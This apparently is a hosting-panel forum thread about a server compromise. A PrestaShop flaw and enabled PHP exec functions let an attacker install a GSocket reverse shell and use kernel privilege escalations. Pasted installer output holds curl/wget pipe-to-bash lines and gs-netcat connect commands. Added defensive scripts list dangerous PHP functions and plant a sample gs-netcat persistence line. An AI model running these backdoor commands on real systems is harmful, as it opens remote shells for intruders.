Possible attack on Keyhelp panels

Have you discovered a bug? Tell us about it.
theqkash
Posts: 20
Joined: Wed 21. Dec 2022, 01:43

Re: Possible attack on Keyhelp panels

Post by theqkash »

It didn't have a blank password. It's an attack, one of several published in the last few days. It allows any user on the system to escalate privileges to the root account, and then things like this show up in the logs. It is not a normal situation, but it is related to an actual security issue in the kernel.
omexlu
Posts: 271
Joined: Wed 28. Aug 2024, 10:42

Re: Possible attack on Keyhelp panels

Post by omexlu »

@24unix, the code is harmful (PHP and SSH); the attacker also installed GSocket.

The logs you shared show that a Global Socket (GSocket) backdoor has been installed on your server. Even if you believe there was no "SSH access," this tool provides the attacker with a permanent, interactive reverse shell that is even more dangerous than a standard SSH breach.
24unix
Posts: 2232
Joined: Sun 21. Jun 2020, 17:16
Location: Kollmar

Re: Possible attack on Keyhelp panels

Post by 24unix »

omexlu wrote: Thu 14. May 2026, 19:25 @24unix, the code is harmful (PHP and SSH); the attacker also installed GSocket.
I said it is simple, not harmless.
Cheers Micha
--
Backup: The duplicate copy of crucial data that no one bothered to make;
used only in the abstract
Eoler
Posts: 21
Joined: Tue 2. Jul 2019, 01:20

Re: Possible attack on Keyhelp panels

Post by Eoler »

theqkash wrote: Thu 14. May 2026, 19:24 It didn't have a blank password. It's an attack, one of several published in the last few days. It allows any user on the system to escalate privileges to the root account, and then things like this show up in the logs. It is not a normal situation, but it is related to an actual security issue in the kernel.
Yes, they are all LPEs if a user with shell access is compromised:
https://copy.fail/
https://ubuntu.com/blog/dirty-frag-linu ... -available
https://tuxcare.com/blog/fragnesia-cve- ... ernel-lpe/
omexlu
Posts: 271
Joined: Wed 28. Aug 2024, 10:42

Re: Possible attack on Keyhelp panels

Post by omexlu »

So how do we actually prevent that? My users don't have SSH access.
theqkash
Posts: 20
Joined: Wed 21. Dec 2022, 01:43

Re: Possible attack on Keyhelp panels

Post by theqkash »

Once again, it doesn't require SSH. You have to disable functions in the PHP config of your sites to block the possibility of running software, e.g. exec, system, shell_exec, passthru.

My users also didn't have any SSH, but because a user within PHP was able to run software via functions like the ones above, they were able to get out of their user context and work as root.
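To turn the advice in this post into something checkable, here is an added example (not code from the thread, from KeyHelp or from any of the posters) that reads a php.ini or PHP-FPM pool file and lists which shell-spawning PHP functions are still callable. The four functions named in the post are included; popen, proc_open and pcntl_exec are my own additions, and the two pool files are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the thread: report which shell/process-spawning PHP
# functions a php.ini or PHP-FPM pool file still leaves enabled. The four the
# post names (exec, system, shell_exec, passthru) are included; the remaining
# names are my own addition of the usual companions, not something the thread lists.
DANGEROUS="exec system shell_exec passthru popen proc_open pcntl_exec"

# php_disabled_functions FILE -> the comma-separated disable_functions value in FILE.
# Handles both "disable_functions =" (php.ini) and
# "php_admin_value[disable_functions] =" (FPM pool); if the directive repeats,
# the last one wins, as it does for PHP itself.
php_disabled_functions() {
    sed -n -E 's/^[[:space:]]*(php_admin_value\[disable_functions\]|disable_functions)[[:space:]]*=[[:space:]]*//p' "$1" \
      | tail -n 1 | tr -d ' "'
}

# php_enabled_dangerous FILE -> dangerous functions NOT in disable_functions, one per line
# (prints nothing when every function in DANGEROUS is blocked)
php_enabled_dangerous() {
    disabled=",$(php_disabled_functions "$1"),"
    for f in $DANGEROUS; do
        case "$disabled" in
            *",$f,"*) ;;          # blocked by the configuration
            *) echo "$f" ;;       # still callable from PHP code on this site
        esac
    done
}

# --- Constructed sample pool files (fabricated for this demo) ---
tmp=$(mktemp -d)
cat > "$tmp/weak.conf" <<'EOF'
[dominio-com]
user = dominio-com
; only one function blocked: a web shell can still call exec() & co.
php_admin_value[disable_functions] = pcntl_exec
EOF
cat > "$tmp/hardened.conf" <<'EOF'
[dominio-com]
user = dominio-com
; php_admin_value pins the setting for the pool; site code cannot loosen it
php_admin_value[disable_functions] = exec,system,shell_exec,passthru,popen,proc_open,pcntl_exec
EOF

for conf in weak hardened; do
    echo "== $conf.conf: still enabled =="
    php_enabled_dangerous "$tmp/$conf.conf"
done
```

Run it against each pool file (on Debian-style layouts that is /etc/php/*/fpm/pool.d/*.conf; the path is an assumption and varies by distribution and panel). Because FPM gives every site its own pool, the list can be per site: a shop that genuinely needs exec() for an image tool keeps it, everyone else loses it. Keep in mind what this does and does not do: it removes the easiest way to launch a binary from a hijacked PHP application, but the escalation the thread links to is a kernel bug, so the kernel update is still the actual fix and this is the layer that buys time.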
theqkash
Posts: 20
Joined: Wed 21. Dec 2022, 01:43

Re: Possible attack on Keyhelp panels

Post by theqkash »

Eoler wrote: Thu 14. May 2026, 19:29 Yes, they are all LPEs if a user with shell access is compromised:
The issue is, you don't need to give the user SSH access. The user just needs shell_exec or similar, and that is it.

Weird times...
Eoler
Posts: 21
Joined: Tue 2. Jul 2019, 01:20

Re: Possible attack on Keyhelp panels

Post by Eoler »

theqkash wrote: Thu 14. May 2026, 22:55 The issue is, you don't need to give the user SSH access. The user just needs shell_exec or similar, and that is it.
Weird times...
Yes, that's why I wrote "shell" and not "SSH"... ;-)
Look at this beauty - weird times indeed: https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn
Ralph
Posts: 1511
Joined: Mon 30. Mar 2020, 16:14

Re: Possible attack on Keyhelp panels

Post by Ralph »

In most cases ... the PHP function "fopen()" is used as an entry point for hacking outdated PHP applications (CMS).
superjogi
Posts: 176
Joined: Sat 11. Jan 2020, 23:24

Re: Possible attack on Keyhelp panels

Post by superjogi »

Let us think about this for a moment.

So are you saying a client website was hacked and, because the server was not patched against the recent privilege escalation vulnerabilities, it escalated to the server?

Or are you saying they hacked the panel directly, similar to WordPress?

Because these are 2 things.

WordPress hacks I know and have had occasionally and cleaned them up.
I also saw that isolation of accounts is great.
kurgans
Posts: 42
Joined: Mon 2. Nov 2020, 12:57

Re: Possible attack on Keyhelp panels

Post by kurgans »

Yes... exactly as you're seeing: due to a PrestaShop bug and the combination of enabled PHP functions, it was possible to download and execute a shell that bypasses all kernel controls.

Gaining unrestricted access to the entire environment.

-> WARNING: Using existing secret from '/home/users/dominio-com//.config/htop/defunct.dat'
--> Trying x86_64-alpine
Downloading binaries........................................................ [OK]
Unpacking binaries.......................................................... [OK]
Copying binaries............................................................ [OK]
Testing binaries............................................................ [OK]
Testing Global Socket Relay Network.....................................[FAILED]
--> Secret 'fcc' is already used.
--> To uninstall, use GS_UNDO=1 bash -c "$(curl -fsSL https:)"
--> To connect, use one of the following:
--> gs-netcat -s "abc" -i
--> S="tzh" bash -c "$(curl -fsSL https:)"
--> S="abg" bash -c "$(wget -qO- https:)"

We were very lucky that Zabbix detected the problem and the tampering and issued an alert, and the attacker only had time to install the shell

GS_UNDO=1 bash -c “$(curl -fsSL https://)”

and we were able to trace where it went and which files it included as root

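As an added example (not from the thread and not something kurgans or Zabbix ran), the following script hunts for the traces the log above makes visible: the .config/htop/defunct.dat secret file the installer reported, plus shell-startup files that reference gs-netcat or gsocket. The sample home tree, the secret contents and the .bashrc line are fabricated for the demo; the persistence locations checked are my assumption, not something the log confirms.

```shell
#!/bin/sh
# Added example, not from the thread: hunt for the GSocket traces that appear in
# the installer output above. It printed its secret path as
# /home/users/<site>//.config/htop/defunct.dat, so we look under every home for a
# .config/htop/ directory holding "defunct*" files (a real htop keeps only htoprc
# there) and for shell-startup files / user systemd units that mention gsocket
# tooling. Where the installer persists itself is an assumption; extend as needed.

# gsocket_secret_files ROOT -> paths of */.config/htop/defunct* regular files under ROOT
gsocket_secret_files() {
    find "$1" -path '*/.config/htop/defunct*' -type f 2>/dev/null | sort
}

# gsocket_persistence_refs ROOT -> startup files under ROOT that mention gsocket tooling
gsocket_persistence_refs() {
    find "$1" -type f \( -name '.bashrc' -o -name '.profile' -o -name '.bash_profile' \
                         -o -name '.zshrc' -o -path '*/.config/systemd/user/*' \) \
         -exec grep -lE 'gs-netcat|gsocket|GS_UNDO' {} + 2>/dev/null | sort
}

# gsocket_running -> live-host check: pid and command line of gs-netcat processes.
# Not exercised by the constructed sample below; run it on the suspect host.
gsocket_running() {
    ps -eo pid=,args= 2>/dev/null | grep -E '[g]s-netcat'
}

# --- Constructed sample home tree (every file below is fabricated for this demo) ---
root=$(mktemp -d)
mkdir -p "$root/users/clean-com/.config/htop" "$root/users/dominio-com/.config/htop"
echo 'color_scheme=0' > "$root/users/clean-com/.config/htop/htoprc"        # legitimate htop config
echo 'color_scheme=0' > "$root/users/dominio-com/.config/htop/htoprc"
echo 'not-a-real-secret' > "$root/users/dominio-com/.config/htop/defunct.dat"  # the indicator from the log
echo 'export EDITOR=vi' > "$root/users/clean-com/.bashrc"
# fabricated persistence line: relaunch the listener whenever the account gets a shell
echo '(gs-netcat -s "abc" -l -i >/dev/null 2>&1 &)' >> "$root/users/dominio-com/.bashrc"

echo "== secret files =="
gsocket_secret_files "$root"
echo "== persistence refs =="
gsocket_persistence_refs "$root"
```

Point it at /home (or at a mounted image of the disk) and review every hit by hand. Do not use the installer's own GS_UNDO=1 bash -c "$(curl -fsSL ...)" line as your clean-up: it downloads and runs the attacker's script a second time. Remove the files, kill the processes, rotate every credential the compromised account could read, and if the traces show the shell reached root, treat the host as untrusted until it is rebuilt.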
superjogi
Posts: 176
Joined: Sat 11. Jan 2020, 23:24

Re: Possible attack on Keyhelp panels

Post by superjogi »

The information is useful.
You are hotlinking the virus. :D

How did you use Zabbix? Is it installed on each server, or is it a cloud instance that monitored the other servers?
How did you mitigate the problem on the server? Did you delete the shell, or were there new users?
Henning
Posts: 217
Joined: Wed 6. Apr 2022, 16:19
Location: Oldenburg

Re: Possible attack on Keyhelp panels

Post by Henning »

I'm following this thread very closely. It doesn't make me nervous, but I'd appreciate it if there could be some general information on whether, as an administrator, there's anything I can or need to do.
Kind regards, Henning
Tobi
Community Moderator
Posts: 3674
Joined: Thu 5. Jan 2017, 13:24

Re: Possible attack on Keyhelp panels

Post by Tobi »

The best protection against this kind of attack is:
1. Do not use outdated software
2. Allow only the PHP functions you need
3. Ensure the hardest isolation of user accounts using KeyHelp Pro and SSH jail
Regards,
Tobi


-----------------------------
wewoco.de
The forum for resellers, digital agencies, screen workers and mouse pushers
Tobi
Community Moderator
Posts: 3674
Joined: Thu 5. Jan 2017, 13:24

Re: Possible attack on Keyhelp panels

Post by Tobi »

@kurgans
Please do not post links to malware!
Always anonymize such content!
Thanks for your cooperation!
Regards,
Tobi